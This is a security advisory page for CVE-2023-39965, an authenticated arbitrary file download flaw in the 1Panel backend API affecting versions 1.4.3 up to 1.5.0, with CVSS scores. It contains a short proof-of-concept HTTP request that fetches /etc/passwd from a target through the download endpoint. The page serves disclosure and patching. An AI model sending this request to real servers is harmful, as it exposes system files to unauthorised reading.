CVE-2023-39965

MEDIUM6.5EPSS 0.11%

1Panel Arbitrary File Download vulnerability

Published: 8/10/2023Modified: 8/21/2024

Also known as:GHSA-85cf-gj29-f555GO-2023-2005

Description

### Summary Any file downloading vulnerability exists in 1Panel backend. ### Details Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access. ![image](https://user-images.githubusercontent.com/116613486/257246024-d0e35800-5fd8-4907-8b1b-504afaad859e.png) ### PoC payload: POST /api/v1/files/download/bypath HTTP/1.1 Host: ip Content-Type: application/json {"path":"/etc/passwd"} ![f77959349e96543436eea18283fa75c](https://user-images.githubusercontent.com/116613486/257245459-13f2f31b-fcfe-4a27-ba52-e2f1e5d4d749.png) ### Impact Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.

Affected packages (2)

Go/github.com/1Panel-dev/1Panel>= 1.4.3, < 1.5.0
Go/github.com/1Panel-dev/1Panel>= 1.4.3, < 1.5.0

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	MEDIUM6.5	CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Description

Affected packages (2)

CVSS scores

References (4)